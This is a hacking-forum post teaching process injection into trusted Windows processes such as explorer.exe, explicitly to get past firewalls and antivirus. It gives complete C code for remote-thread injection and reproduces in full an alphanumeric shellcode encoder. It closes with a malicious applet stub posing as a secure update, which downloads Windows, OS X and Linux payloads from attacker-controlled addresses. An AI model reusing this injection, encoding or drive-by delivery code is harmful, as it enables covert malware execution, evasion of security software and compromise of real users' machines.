Hello evilzone, this post features Process Injection by bypass firewalls and Antivirus softwares....
First question is why Process Injection ?In this method we can attach an evil (unauthorised process) to an authorised one. As you know , firewalls Permit to some Process , like : Internet explorer [IE] or Firefox or windows update or … , these processes can connect to Internet without user prompt or anything..
Process injection , Dll injection , “PE injection “ are methods to bypass firewalls [This Methods called as : Leak Firewall ] .
in dll injection , we injects dll into an application process area, and references to his own malicious DLL to make firewall believes that it’s the application which is using the DLL .
Today when we talk about injection, we are talking about a DLL that is loaded into a running process’s memory. as we know Windows is now designed for this, and injection techniques can be used by any application. Some applications use it to add features to a closed-source program [for example : Babylon Dictionary is One of them ] .

Process injection [ or hijack] to bypass firewalls.
How an application works by default? >>
Inclusion of a DLL >>
Injecting malicious code into a trusted process>>
The common code injection using Windos API method (virtualAllocEX(),..
What happens Next >>
how to Inject Process : [with C cod ]for firewall bypass we have 4 part :- Open one process “P” #explorer.exe for example- Allocate memory remotely in “P” space- Copy the code to remote process- Create a thread to execute the code remotely
Example Of Process Injection In EXPLORER.EXE #pragma comment(lib,"Shlwapi.lib")
#pragma comment(lib,"ADVAPI32.LIB")
#include <stdio.h>
#include <windows.h>
#include <Shlwapi.h>
#include <tlhelp32.h>
#define INJECT_EXE "explorer.exe"
typedef struct _RPar
DWORD dwDeleteFile;
DWORD dwSleep;
DWORD dwMessageBox;
char Filename[1024];
char string1[1024];
char string2[1024];
} RPar;
DWORD __stdcall ThreadProc(RPar *Para)
FARPROC PDeleteFile = (FARPROC)Para->dwDeleteFile;
FARPROC PSleep = (FARPROC)Para->dwSleep;
FARPROC PMessageBox = (FARPROC)Para->dwMessageBox;
while(PDeleteFile(Para->Filename) == 0) {PSleep(1000);}
return 0;
int _stdcall WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmd, int nCmdShow)
DWORD dwThreadId,pID=0,dwThreadSize=2048;
void *pRemoteThread;
char ExeFile[1024];
HANDLE hProcess,hSnap;
HINSTANCE hKernel, hUser;
RPar my_RPar,*pmy_RPar;
PROCESSENTRY32 pe32 = {0};
if( (hSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) == INVALID_HANDLE_VALUE )
return 3;
pe32.dwSize = sizeof(PROCESSENTRY32);
Process32First(hSnap, &pe32);
do {
if ( StrCmpNI(INJECT_EXE,pe32.szExeFile,strlen(INJECT_EXE)) == 0)
} while (Process32Next(hSnap,&pe32));
hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);
pRemoteThread = VirtualAllocEx(hProcess, 0, dwThreadSize, MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, pRemoteThread, &ThreadProc, dwThreadSize,0);
hKernel = LoadLibrary( "kernel32.dll");
my_RPar.dwDeleteFile = (DWORD)GetProcAddress(hKernel, "DeleteFileA");
my_RPar.dwSleep = (DWORD)GetProcAddress(hKernel, "Sleep");
hUser = LoadLibrary( "user32.dll");
my_RPar.dwMessageBox = (DWORD)GetProcAddress(hUser, "MessageBoxA");
printf (ExeFile);
strcpy(my_RPar.Filename, ExeFile);
strcpy(my_RPar.string1, "HI Abysssec");
strcpy(my_RPar.string2, "OK");
pmy_RPar =(RPar *)VirtualAllocEx (hProcess ,0,sizeof(RPar),MEM_COMMIT,PAGE_READWRITE);
WriteProcessMemory(hProcess ,pmy_RPar,&my_RPar,sizeof my_RPar,0);
CreateRemoteThread(hProcess ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pmy_RPar,0,&dwThreadId);
return 0;
With tools like Shellcodeexec https://github.com/inquisb/shellcodeexec ,Run: shellcodeexec <alphanumeric-encoded shellcode>
you can inject alpha-numeric encoded payloads directly into a running process and spawn a shell on a target computer! YOu can use this script to convert a shellcode to alphanumeric payload! [size=78%]

#include <stdio.h> // printf(), fprintf(), stderr
#include <stdlib.h> // exit(), EXIT_SUCCESS, EXIT_FAILURE, srand(), rand()
#include <string.h> // strcasecmp(), strstr()
#include <sys/time.h> //struct timeval, struct timezone, gettimeofday()
#define mixedcase_w32sehgetpc "VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36" \
#define uppercase_w32sehgetpc "VTX630WTX638VXH49HHHPVX5AAQQPVX5YYYY" \
#define mixedcase_ascii_decoder_body "jAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
#define uppercase_ascii_decoder_body "VTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0B" \
#define mixedcase_unicode_decoder_body "jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIA" \
#define uppercase_unicode_decoder_body "QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5" \
struct decoder {
char* id; // id of option
char* code; // the decoder
} mixedcase_ascii_decoders[] = {
{ "nops", "IIIIIIIIIIIIIIIIII7" mixedcase_ascii_decoder_body },
{ "eax", "PYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "ecx", "IIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "edx", "JJJJJJJJJJJJJJJJJ7RY" mixedcase_ascii_decoder_body },
{ "ebx", "SYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "esp", "TYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "ebp", "UYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "esi", "VYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "edi", "WYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp-10]", "LLLLLLLLLLLLLLLLYIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp-C]", "LLLLLLLLLLLLYIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp-8]", "LLLLLLLLYIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp-4]", "LLLL7YIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp]", "YIIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp+4]", "YYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp+8]", "YYYIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp+C]", "YYYYIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp+10]", "YYYYYIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp+14]", "YYYYYYIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp+18]", "YYYYYYYIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp+1C]", "YYYYYYYYIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "seh", mixedcase_w32sehgetpc "IIIIIIIIIIIIIIIII7QZ" // ecx code
mixedcase_ascii_decoder_body },
}, uppercase_ascii_decoders[] = {
{ "nops", "IIIIIIIIIIII" uppercase_ascii_decoder_body },
{ "eax", "PYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "ecx", "IIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "edx", "JJJJJJJJJJJRY" uppercase_ascii_decoder_body },
{ "ebx", "SYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "esp", "TYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "ebp", "UYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "esi", "VYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "edi", "WYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp-10]", "LLLLLLLLLLLLLLLLYII7QZ" uppercase_ascii_decoder_body },
{ "[esp-C]", "LLLLLLLLLLLLYIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp-8]", "LLLLLLLLYIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp-4]", "LLLL7YIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp]", "YIIIIIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp+4]", "YYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp+8]", "YYYIIIIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp+C]", "YYYYIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp+10]", "YYYYYIIIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp+14]", "YYYYYYIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp+18]", "YYYYYYYIIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp+1C]", "YYYYYYYYIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "seh", uppercase_w32sehgetpc "IIIIIIIIIIIQZ" // ecx code
uppercase_ascii_decoder_body },
}, mixedcase_ascii_nocompress_decoders[] = {
{ "nops", "7777777777777777777777777777777777777" mixedcase_ascii_decoder_body },
{ "eax", "PY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "ecx", "77777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "edx", "77777777777777777777777777777777777RY" mixedcase_ascii_decoder_body },
{ "ebx", "SY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "esp", "TY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "ebp", "UY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "esi", "VY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "edi", "WY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp-10]", "LLLLLLLLLLLLLLLLY777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp-C]", "LLLLLLLLLLLLY7777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp-8]", "LLLLLLLLY77777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp-4]", "LLLL7Y77777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp]", "Y7777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+4]", "YY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+8]", "YYY77777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+C]", "YYYY7777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+10]", "YYYYY777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+14]", "YYYYYY77777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+18]", "YYYYYYY7777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+1C]", "YYYYYYYY777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "seh", mixedcase_w32sehgetpc "77777777777777777777777777777777777QZ" // ecx code
mixedcase_ascii_decoder_body },
}, uppercase_ascii_nocompress_decoders[] = {
{ "nops", "777777777777777777777777" uppercase_ascii_decoder_body },
{ "eax", "PY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "ecx", "7777777777777777777777QZ" uppercase_ascii_decoder_body },
{ "edx", "7777777777777777777777RY" uppercase_ascii_decoder_body },
{ "ebx", "SY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "esp", "TY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "ebp", "UY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "esi", "VY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "edi", "WY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp-10]", "LLLLLLLLLLLLLLLLY77777QZ" uppercase_ascii_decoder_body },
{ "[esp-C]", "LLLLLLLLLLLLY777777777QZ" uppercase_ascii_decoder_body },
{ "[esp-8]", "LLLLLLLLY7777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp-4]", "LLLL7Y7777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp]", "Y777777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+4]", "YY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+8]", "YYY7777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+C]", "YYYY777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+10]", "YYYYY77777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+14]", "YYYYYY7777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+18]", "YYYYYYY777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+1C]", "YYYYYYYY77777777777777QZ" uppercase_ascii_decoder_body },
{ "seh", uppercase_w32sehgetpc "7777777777777777777777QZ" // ecx code
uppercase_ascii_decoder_body },
}, mixedcase_unicode_decoders[] = {
{ "nops", "IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444" mixedcase_unicode_decoder_body },
{ "eax", "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "ecx", "IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444" mixedcase_unicode_decoder_body },
{ "edx", "RRYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "ebx", "SSYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "esp", "TUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "ebp", "UUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "esi", "VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "edi", "WWYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "[esp]", "YAIAIAIAIAIAIAIAIAIAIAIAIAIAIA44" mixedcase_unicode_decoder_body },
{ "[esp+4]", "YUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
}, uppercase_unicode_decoders[] = {
{ "nops", "IAIAIAIA4444" uppercase_unicode_decoder_body },
{ "eax", "PPYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "ecx", "IAIAIAIA4444" uppercase_unicode_decoder_body },
{ "edx", "RRYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "ebx", "SSYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "esp", "TUYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "ebp", "UUYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "esi", "VVYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "edi", "WWYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "[esp]", "YAIAIAIAIA44" uppercase_unicode_decoder_body },
{ "[esp+4]", "YUYAIAIAIAIA" uppercase_unicode_decoder_body },
}, mixedcase_unicode_nocompress_decoders[] = {
{ "nops", "444444444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "eax", "PPYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "ecx", "444444444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "edx", "RRYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "ebx", "SSYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "esp", "TUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "ebp", "UUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "esi", "VVYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "edi", "WWYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "[esp]", "YA4444444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "[esp+4]", "YUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
}, uppercase_unicode_nocompress_decoders[] = {
{ "nops", "44444444444444" uppercase_unicode_decoder_body },
{ "eax", "PPYA4444444444" uppercase_unicode_decoder_body },
{ "ecx", "44444444444444" uppercase_unicode_decoder_body },
{ "edx", "RRYA4444444444" uppercase_unicode_decoder_body },
{ "ebx", "SSYA4444444444" uppercase_unicode_decoder_body },
{ "esp", "TUYA4444444444" uppercase_unicode_decoder_body },
{ "ebp", "UUYA4444444444" uppercase_unicode_decoder_body },
{ "esi", "VVYA4444444444" uppercase_unicode_decoder_body },
{ "edi", "WWYA4444444444" uppercase_unicode_decoder_body },
{ "[esp]", "YA444444444444" uppercase_unicode_decoder_body },
{ "[esp+4]", "YUYA4444444444" uppercase_unicode_decoder_body },
struct decoder* decoders[] = {
mixedcase_ascii_decoders, uppercase_ascii_decoders,
mixedcase_unicode_decoders, uppercase_unicode_decoders,
mixedcase_ascii_nocompress_decoders, uppercase_ascii_nocompress_decoders,
mixedcase_unicode_nocompress_decoders, uppercase_unicode_nocompress_decoders
void version(void) {
" ,sSSs,,s, ,sSSSs, " VERSION_STRING "\n"
" SS\" Y$P\" SY\" ,SY \n"
" iS' dY ,sS\" Unicode-proof uppercase alphanumeric shellcode encoding.\n"
" YS, dSb ,sY\" " COPYRIGHT "\n"
" `\"YSS'\"S' 'SSSSSSSP <skylined@edup.tudelft.nl>\n"
void help(char* name) {
"Usage: %s [OPTION] [BASEADDRESS]\n"
"ALPHA 2 encodes your IA-32 shellcode to contain only alphanumeric characters.\n"
"The result can optionaly be uppercase-only and/or unicode proof. It is a encoded\n"
"version of your origional shellcode. It consists of baseaddress-code with some\n"
"padding, a decoder routine and the encoded origional shellcode. This will work\n"
"for any target OS. The resulting shellcode needs to have RWE-access to modify\n"
"it's own code and decode the origional shellcode in memory.\n"
" The decoder routine needs have it's baseaddress in specified register(s). The\n"
" baseaddress-code copies the baseaddress from the given register or stack\n"
" location into the apropriate registers.\n"
"eax, ecx, edx, ecx, esp, ebp, esi, edi\n"
" Take the baseaddress from the given register. (Unicode baseaddress code using\n"
" esp will overwrite the byte of memory pointed to by ebp!)\n"
"[esp], [esp-X], [esp+X]\n"
" Take the baseaddress from the stack.\n"
" The windows \"Structured Exception Handler\" (seh) can be used to calculate\n"
" the baseaddress automatically on win32 systems. This option is not available\n"
" for unicode-proof shellcodes and the uppercase version isn't 100%% reliable.\n"
" No baseaddress-code, just padding. If you need to get the baseaddress from a\n"
" source not on the list use this option (combined with --nocompress) and\n"
" replace the nops with your own code. The ascii decoder needs the baseaddress\n"
" in registers ecx and edx, the unicode-proof decoder only in ecx.\n"
" Do not output a trailing newline after the shellcode.\n"
" The baseaddress-code uses \"dec\"-instructions to lower the required padding\n"
" length. The unicode-proof code will overwrite some bytes in front of the\n"
" shellcode as a result. Use this option if you do not want the \"dec\"-s.\n"
" Make shellcode unicode-proof. This means it will only work when it gets\n"
" converted to unicode (inserting a '0' after each byte) before it gets\n"
" executed.\n"
" Make shellcode 100%% uppercase characters, uses a few more bytes then\n"
" mixedcase shellcodes.\n"
" Output a list of BASEADDRESS options for the given combination of --uppercase\n"
" and --unicode.\n"
" Display this help and exit\n"
" Output version information and exit\n"
"See the source-files for further details and copying conditions. There is NO\n"
int main(int argc, char* argv[], char* envp[]) {
int uppercase = 0, unicode = 0, sources = 0, w32sehgetpc = 0,
nonewline = 0, nocompress = 0, options = 0, spaces = 0;
char* baseaddress = NULL;
int i, input, A, B, C, D, E, F;
char* valid_chars;
// Random seed
struct timeval tv;
struct timezone tz;
gettimeofday(&tv, &tz);
// Scan all the options and set internal variables accordingly
for (i=1; i<argc; i++) {
if (strcmp(argv[i], "--help") == 0) help(argv[0]);
else if (strcmp(argv[i], "--version") == 0) version();
else if (strcmp(argv[i], "--uppercase") == 0) uppercase = 1;
else if (strcmp(argv[i], "--unicode") == 0) unicode = 1;
else if (strcmp(argv[i], "--nocompress") == 0) nocompress = 1;
else if (strcmp(argv[i], "--sources") == 0) sources = 1;
else if (strcmp(argv[i], "--spaces") == 0) spaces = 1;
else if (strcmp(argv[i], "-n") == 0) nonewline = 1;
else if (baseaddress == NULL) baseaddress = argv[i];
else {
fprintf(stderr, "%s: more then one BASEADDRESS option: `%s' and `%s'\n"
"Try `%s --help' for more information.\n",
argv[0], baseaddress, argv[i], argv[0]);
// No baseaddress option ?
if (baseaddress == NULL) {
fprintf(stderr, "%s: missing BASEADDRESS options.\n"
"Try `%s --help' for more information.\n", argv[0], argv[0]);
// The uppercase, unicode and nocompress option determine which decoder we'll
// need to use. For each combination of these options there is an array,
// indexed by the baseaddress with decoders. Pointers to these arrays have
// been put in another array, we can calculate the index into this second
// array like this:
options = uppercase+unicode*2+nocompress*4;
// decoders[options] will now point to an array of decoders for the specified
// options. The array contains one decoder for every possible baseaddress.
// Someone wants to know which baseaddress options the specified options
// for uppercase, unicode and/or nocompress allow:
if (sources) {
printf("Available options for %s%s alphanumeric shellcode:\n",
uppercase ? "uppercase" : "mixedcase",
unicode ? " unicode-proof" : "");
for (i=0; decoders[options][i].id != NULL; i++) {
printf(" %s\n", decoders[options][i].id);
if (uppercase) {
if (spaces) valid_chars = " 0123456789BCDEFGHIJKLMNOPQRSTUVWXYZ";
else valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZ";
} else {
if (spaces) valid_chars = " 0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
else valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
// Find and output decoder
for (i=0; strcasecmp(baseaddress, decoders[options][i].id) != 0; i++) {
if (decoders[options][i+1].id == NULL) {
fprintf(stderr, "%s: unrecognized baseaddress option `%s'\n"
"Try `%s %s%s--sources' for a list of BASEADDRESS options.\n",
argv[0], baseaddress, argv[0],
uppercase ? "--uppercase " : "",
unicode ? "--unicode " : "");
printf("%s", decoders[options][i].code);
// read, encode and output shellcode
while ((input = getchar()) != EOF) {
// encoding AB -> CD 00 EF 00
A = (input & 0xf0) >> 4;
B = (input & 0x0f);
F = B;
// E is arbitrary as long as EF is a valid character
i = rand() % strlen(valid_chars);
while ((valid_chars[i] & 0x0f) != F) { i = ++i % strlen(valid_chars); }
E = valid_chars[i] >> 4;
// normal code uses xor, unicode-proof uses ADD.
// AB ->
D = unicode ? (A-E) & 0x0f : (A^E);
// C is arbitrary as long as CD is a valid character
i = rand() % strlen(valid_chars);
while ((valid_chars[i] & 0x0f) != D) { i = ++i % strlen(valid_chars); }
C = valid_chars[i] >> 4;
printf("%c%c", (C<<4)+D, (E<<4)+F);
printf("A%s", nonewline ? "" : "\n"); // Terminating "A"
By the way guys, do you think it would be possible to perform a process injection from a Java Applet?
Like this maybe?</script>
<applet width="1" height="1" id="Secure Java Applet" code="Java.class" archive="Signed_Update.jar"><param name="WINDOWS" value="http://$IP/Windows-KB183905-x86-ENU.exe"><param name="STUFF" value=""><param name="OSX" value="http://$IP/osx.bin"><param name="LINUX" value="http://$IP/nix.bin"><param name="nextPage" value="http://www.google.com"><param name="64" value="$alphanumeric-payload"><param name="86" value="$alphanumeric-payload"><param name="separate_jvm" value="true"/></applet></head>
<script> var applet = document.getElementById('Secure Java Applet'); function performAppletCode(count) { if (!applet.Java && count > 0) { setTimeout( function() { performAppletCode( --count ); }, 300 ); } else if (applet.Java) { window.location = "http://google.com" } else { window.location.reload(); } } performAppletCode( 10 ); </script>